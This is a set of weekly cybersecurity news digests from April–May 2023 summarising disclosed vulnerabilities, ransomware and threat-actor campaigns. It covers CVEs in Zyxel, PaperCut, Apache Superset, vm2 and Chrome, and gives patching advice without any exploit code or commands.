04/26/2023-05/03/2023 New BGP Flaws, Apache Superset Vulnerability, Zyxel Firewall Devices Vulnerable And More

1. CISA Issues Advisory on Critical RCE Affecting ME RTU Remote Terminal Units

(CISA)  released an Industrial Control Systems (ICS) advisory about a critical flaw affecting ME RTU remote terminal units. The security vulnerability, tracked as CVE-2023-2131, has received the highest severity rating of 10.0 on the CVSS scoring system for its low attack complexity. Successful exploitation of this vulnerability could allow remote code execution.CISA has also urged entities to adopt guidance issued by NIST to identify, assess, and mitigate supply chain risks, and enroll for the agency’s free Vulnerability Scanning service to pinpoint vulnerable and high-risk devices.

2. Researchers Uncover New BGP Flaws in Popular Internet Routing Protocol Software

Cybersecurity researchers have uncovered weaknesses in a software implementation of the Border Gateway Protocol (BGP) that could be weaponized to achieve a denial-of-service (DoS) condition on vulnerable BGP peers. The three vulnerabilities reside in version 8.4 of FRRouting, a popular open source internet routing protocol suite for Linux and Unix platforms. It’s currently used by several vendors like NVIDIA Cumulus, DENT, and SONiC, posing supply chain risks. BGP is a gateway protocol that’s designed to exchange routing and reachability information between autonomous systems. It’s used to find the most efficient routes for delivering internet traffic.  Three flaws (CVE-2022-40302, CVE-2022-40318, and CVE-2022-43681) with a CVSS score of 6.5 involve out-of-bounds reads when processing malformed BGP OPEN messages. These flaws could result in a DoS attack, rendering the peer unresponsive by dropping all BGP sessions and routing tables.

3. Alert: Active Exploitation of TP-Link, Apache, and Oracle Vulnerabilities Detected

Three high-severity security vulnerabilities have been added to the KEV catalog: CVE-2023-1389, CVE-2021-45046, and CVE-2023-21839. CVE-2023-1389 concerns a command injection flaw affecting TP-Link Archer AX-21 routers, being exploited by the Mirai botnet since April 11, 2023. CVE-2021-45046 is a remote code execution flaw affecting Apache Log4j2 logging library, with evidence of exploitation attempts over the past 30 days. CVE-2023-21839 is an unspecified vulnerability in Oracle WebLogic Server that allows unauthorized access to sensitive data via T3 and IIOP. All three vulnerabilities have a high CVSS score and pose significant security risks. It is essential to apply patches and security updates promptly to avoid potential security breaches.

4. Zyxel Firewall Devices Vulnerable to Remote Code Execution Attacks — Patch Now

Zyxel has released patches for a critical security flaw in its firewall devices, tracked as CVE-2023-28771, which could lead to remote code execution. The vulnerability, rated 9.8 on the CVSS scoring system, was reported by researchers from TRAPA Security. The flaw was caused by “improper error message handling” in some firewall versions, enabling unauthenticated attackers to remotely execute OS commands by sending forged packets to an impacted device. Zyxel has addressed a high-severity post-authentication command injection flaw affecting specific firewall versions, which allowed authenticated attackers to remotely execute some OS commands. The firm also fixed five high-severity vulnerabilities and one medium-severity bug impacting numerous firewalls and access point devices, which could result in code execution and a denial-of-service condition.

5. RTM Locker’s First Linux Ransomware Strain Targeting NAS and ESXi Hosts

The RTM Locker ransomware group has developed a new strain capable of infecting Linux machines, marking their first foray into open source operating systems. According to a report by Uptycs, the malware is inspired by the Babuk ransomware’s leaked source code and encrypts files using a combination of asymmetric and symmetric encryption. RTM Locker was first identified by Trellix, which described its developers as a private ransomware-as-a-service (RaaS) provider that avoids high-profile targets to draw as little attention as possible. The Linux version targets ESXi hosts by terminating all virtual machines running on a compromised host before starting the encryption process. The initial infector used to deliver the ransomware is unknown, and the encryption function uses pthreads to speed up execution. After successful encryption, victims must contact the support team within 48 hours via Tox or risk having their data published.

6. Apache Superset Vulnerability: Insecure Default Configuration Exposes Servers to RCE Attacks

Apache Superset has released fixes for a vulnerability that could lead to remote code execution. Versions up to and including 2.0.1 are impacted by the vulnerability, which relates to the use of a default SECRET_KEY that can be used by attackers to access unauthorized resources on internet-exposed installations. The issue allows an attacker to gain remote code execution, steal credentials, and compromise data. Horizon3.ai’s chief architect, Naveen Sunkavally, warns of “a dangerous default configuration in Apache Superset.” Superset instances that have changed the default value for the SECRET_KEY configuration to a more cryptographically secure random string are not affected by the flaw. The vulnerability is tracked as CVE-2023-27524 and has a CVSS score of 8.9.

04/20/2023-04/27/2023 Critical Patches for Workstation and Fusion Software, SLP Vulnerability, Exploit Released For PaperCut Flaw And More

1. VMware Releases Critical Patches for Workstation and Fusion Software

VMware has released updates to resolve multiple security flaws impacting its Workstation and Fusion software, the most critical of which could allow a local attacker to achieve code execution. The vulnerability, tracked as CVE-2023-20869 (CVSS score: 9.3), is described as a stack-based buffer-overflow vulnerability that resides in the functionality for sharing host Bluetooth devices with the virtual machine. A malicious actor with local administrative privileges on a virtual machine may exploit this issue to execute code as the virtual machine’s VMX process running on the host. VMware has also patched two additional shortcomings, which include a local privilege escalation flaw (CVE-2023-20871, CVSS score: 7.3) in Fusion and an out-of-bounds read/write vulnerability in SCSI CD/DVD device emulation (CVE-2023-20872, CVSS score: 7.7). While the former could enable a bad actor with read/write access to the host operating system to obtain root access, the latter could result in arbitrary code execution. 

2. New SLP Vulnerability Could Let Attackers Launch 2200x Powerful DDoS Attacks

Details have emerged about a high-severity security vulnerability impacting Service Location Protocol (SLP) that could be weaponized to launch volumetric denial-of-service attacks against targets. Attackers exploiting this vulnerability could leverage vulnerable instances to launch massive Denial-of-Service (DoS) amplification attacks with a factor as high as 2,200 times, potentially making it one of the largest amplification attacks ever reported. The vulnerability, which has been assigned the identifier CVE-2023-29552 (CVSS score: 8.6), is said to impact more than 2,000 global organizations and over 54,000 SLP instances that are accessible over the internet. Successful exploitation of CVE-2023-29552 could allow permit an attacker to take advantage of susceptible SLP instances to launch a reflection amplification attack and overwhelm a target server with bogus traffic. The best option to address CVE-2023-29552 is to upgrade to a supported release line that is not impacted by the vulnerability.

3. Ransomware Hackers Using AuKill Tool to Disable EDR Software Using BYOVD Attack

Threat actors are employing a previously undocumented “defense evasion tool” dubbed AuKill that’s designed to disable endpoint detection and response (EDR) software by means of a Bring Your Own Vulnerable Driver (BYOVD) attack. The AuKill tool abuses an outdated version of the driver used by version 16.32 of the Microsoft utility, Process Explorer, to disable EDR processes before deploying either a backdoor or ransomware on the target system. The BYOVD technique relies on threat actors misusing a legitimate, but out-of-date and exploitable, driver signed by Microsoft (or using a stolen or leaked certificate) to gain elevated privileges and turn off security mechanisms. By using valid, susceptible drivers, the idea is to bypass a key Windows safeguard known as Driver Signature Enforcement that ensures kernel-mode drivers have been signed by a valid code signing authority before they are allowed to run.

4. Hackers Exploit Outdated WordPress Plugin to Backdoor Thousands of WordPress Sites

Threat actors have been observed leveraging a legitimate but outdated WordPress plugin to surreptitiously backdoor websites as part of an ongoing campaign. The plugin in question is Eval PHP, released by a developer named flashpixx. It allows users to insert PHP code pages and posts of WordPress sites that’s then executed every time the posts are opened in a web browser. GoDaddy’s Sucuri found that infected websites had malicious code injected into the “wp_posts” table, which stores posts, pages, and navigation menus. The injected code creates a PHP script with remote code execution backdoor using the file_put_contents function. Sucuri detected over 6,000 instances of this backdoor in the last 6 months, originating from three Russian IP addresses. Attackers established persistent backdoors by misusing the Eval PHP plugin to save rogue pages as drafts. Rogue pages were created with a legitimate site administrator as the author, suggesting successful login as a privileged user. The plugin was used to execute PHP code inside shortcodes, making it easy to reinfect the website and stay hidden.

Recommendation 
Site owners are advised to secure the WP Admin dashboard as well as watch out for any suspicious logins to prevent threat actors from gaining admin access and install the plugin.

5. CISA Adds 3 Actively Exploited Flaws to KEV Catalog, including Critical PaperCut Bug

The US Cybersecurity and Infrastructure Security Agency (CISA) has added three new vulnerabilities to its Known Exploited Vulnerabilities (KEV) catalog, after evidence of active exploitation. The vulnerabilities are:

• CVE-2023-28432, a MinIO information disclosure vulnerability.
• CVE-2023-27350, an improper access control vulnerability in PaperCut MF/NG.
• CVE-2023-2136, a Google Chrome Skia integer overflow vulnerability.

MinIO maintainers said the information disclosure flaw disclosed all environment variables in a cluster deployment. As many as 18 unique malicious IP addresses from five countries attempted to exploit the flaw over the past 30 days. Threat intelligence firm GreyNoise also noted that an older version of MinIO that’s vulnerable to CVE-2023-28432 was being used in a reference implementation provided by OpenAI for developers to integrate their plugins to ChatGPT. Another flaw affecting PaperCut print management software has been addressed by the vendor.

6. Two Critical Flaws Found in Alibaba Cloud’s PostgreSQL Databases

A chain of two critical flaws has been disclosed in Alibaba Cloud’s ApsaraDB RDS for PostgreSQL and AnalyticDB for PostgreSQL that could be exploited to breach tenant isolation protections and access sensitive data belonging to other customers. The vulnerabilities potentially allowed unauthorized access to Alibaba Cloud customers’ PostgreSQL databases and the ability to perform a supply chain attack on both Alibaba database services, leading to an RCE on Alibaba database services. In a nutshell, the vulnerabilities – a privilege escalation flaw in AnalyticDB and a remote code execution bug in ApsaraDB RDS – made it possible to elevate privileges to root within the container, escape to the underlying Kubernetes node, and ultimately obtain unauthorized access to the API server. Armed with this capability, an attacker could retrieve credentials associated with the container registry from the API server and push a malicious image to gain control of customer databases belonging to other tenants on the shared node.

7. Exploit Released For PaperCut Flaw Abused To Hijack Servers

Attackers are exploiting severe vulnerabilities in the widely-used PaperCut MF/NG print management software to install Atera remote management software to take over servers.
The software’s developer claims it’s used by more than 100 million users from over 70,000 companies worldwide.
The two security flaws (tracked as CVE-2023-27350 and CVE-2023-27351) allow remote attackers to bypass authentication and execute arbitrary code on compromised PaperCut servers with SYSTEM privileges in low-complexity attacks that don’t require user interaction.
Both of these vulnerabilities have been fixed in PaperCut MF and PaperCut NG versions 20.1.7, 21.2.11 and 22.0.9 and later. It is  recommended upgrading to one of these versions containing the fix. 

04/13/2023-04/19/2023 Critical Flaws in vm2 JavaScript Library, APT41’s Use of Open Source GC2 Tool, Kodi Confirms Data Breach And More

1. Critical Flaws in vm2 JavaScript Library Can Lead to Remote Code Execution 

A fresh round of patches has been made available for the vm2 JavaScript library to address two critical flaws that could be exploited to break out of the sandbox protections.Both the flaws – CVE-2023-29199 and CVE-2023-30547 – are rated 9.8 out of 10 on the CVSS scoring system and have been addressed in versions 3.9.16 and 3.9.17, respectively. Successful exploitation of the bugs, which allow an attacker to raise an unsanitized host exception, could be weaponized to escape the sandbox and run arbitrary code in the host context.The disclosure comes a little over a week after vm2 remediated another sandbox escape flaw (CVE-2023-29017, CVSS score: 9.8) that could lead to the execution of arbitrary code on the underlying system.

2. Google Uncovers APT41’s Use of Open Source GC2 Tool to Target Media and Job Sites

A Chinese nation-state group targeted an unnamed Taiwanese media organization to deliver an open source red teaming tool known as Google Command and Control (GC2) amid broader abuse of Google’s infrastructure for malicious ends. The tech giant’s Threat Analysis Group (TAG) attributed the campaign to a threat actor it tracks under the geological and geographical-themed moniker HOODOO. The starting point of the attack is a phishing email that contains links to a password-protected file hosted on Google Drive, which, in turn, incorporates the Go-based GC2 tool to read commands from Google Sheets and exfiltrate data using the cloud storage service. After installation on the victim machine, the malware queries Google Sheets to obtain attacker commands. In addition to exfiltration via Drive, GC2 enables the attacker to download additional files from Drive onto the victim system.

3. Google Releases Urgent Chrome Update to Fix Actively Exploited Zero-Day Vulnerability

Google on Friday released out-of-band updates to resolve an actively exploited zero-day flaw in its Chrome web browser, making it the first such bug to be addressed since the start of the year. Tracked as CVE-2023-2033, the high-severity vulnerability has been described as a type confusion issue in the V8 JavaScript engine. Type confusion in V8 in Google Chrome prior to 112.0.5615.121 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. The tech giant acknowledged that “an exploit for CVE-2023-2033 exists in the wild,” but stopped short of sharing additional technical specifics or indicators of compromise (IoCs) to prevent further exploitation by threat actors.

Recommendation
Users are recommended to upgrade to version 112.0.5615.121 for Windows, macOS, and Linux to mitigate potential threats. Users of Chromium-based browsers such as Microsoft Edge, Brave, Opera, and Vivaldi are also advised to apply the fixes as and when they become available.

4. Vice Society Ransomware Using Stealthy PowerShell Tool for Data Exfiltration

Threat actors associated with the Vice Society ransomware gang have been observed using a bespoke PowerShell-based tool to fly under the radar and automate the process of exfiltrating data from compromised networks. Threat actors (TAs) using built-in data exfiltration methods like [living off the land binaries and scripts] negate the need to bring in external tools that might be flagged by security software and/or human-based security detection mechanisms. These methods can also hide within the general operating environment, providing subversion to the threat actor. The PowerShell script discovered by Unit 42 (w1.ps1) works by identifying mounted drives on the system, and then recursively searching through each of the root directories to facilitate data exfiltration over HTTP. The tool also makes use of exclusion criteria to filter out system files, backups, and folders pointing to web browsers as well as security solutions from Symantec, ESET, and Sophos. The discovery of the data exfiltration script illustrates the ongoing threat of double extortion in the ransomware landscape. It also serves as a reminder for organizations to prioritize robust security protections and stay vigilant against evolving threats.

5. Kodi Confirms Data Breach: 400K User Records and Private Messages Stolen

Kodi, an open source media player software provider, has confirmed a data breach after a cyber attack. Threat actors stole user data and private messages from the company’s MyBB forum database, and attempted to sell the data dump to a cybercrime marketplace. They also created database backups, which were downloaded and deleted. The account used by the threat actors has been disabled, and Kodi has taken down its forum while commissioning a new server. The company emphasized that there is no evidence of unauthorized access to the server hosting the MyBB software. The breach affected 400,635 users, whose forum posts, messages, and personal information were compromised. Kodi plans to redeploy the forum on the latest version of the MyBB software.

6. New Python-Based “Legion” Hacking Tool Emerges on Telegram

Legion, a Python-based credential harvester and hacking tool, is being marketed on Telegram as a way for cybercriminals to break into various online services for further exploitation. The malware includes modules to exploit unpatched versions of Apache, conduct remote code execution attacks, and brute-force cPanel and WebHost Manager accounts. It is designed to exploit web servers running content management systems, PHP, or PHP-based frameworks like Laravel. The primary goal is to hijack the services and weaponize the infrastructure for follow-on attacks, including mass spam and opportunistic phishing campaigns. Legion also retrieves AWS credentials from insecure or misconfigured web servers and delivers SMS spam messages to users of US mobile networks. The origins of the threat actor remain unknown.

7. Severe Android and Novi Survey Vulnerabilities Under Active Exploitation

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has added two vulnerabilities to its Known Exploited Vulnerabilities catalog due to active exploitation. The first vulnerability (CVE-2023-20963) is an Android Framework Privilege Escalation Vulnerability with a CVSS score of 7.8. Google has acknowledged that the vulnerability may be under limited, targeted exploitation. The second vulnerability (CVE-2023-29492) is an insecure deserialization vulnerability in Novi Survey software that allows attackers to execute code on the server remotely. The vulnerability was addressed by the software provider earlier this week. The development follows reports that Android apps from Chinese e-commerce company Pinduoduo were weaponized as a zero-day to steal data and control devices, exploiting the Android Framework Privilege Escalation Vulnerability. Google suspended Pinduoduo’s official app from the Play Store in March due to malware identified in off-Play versions of the software.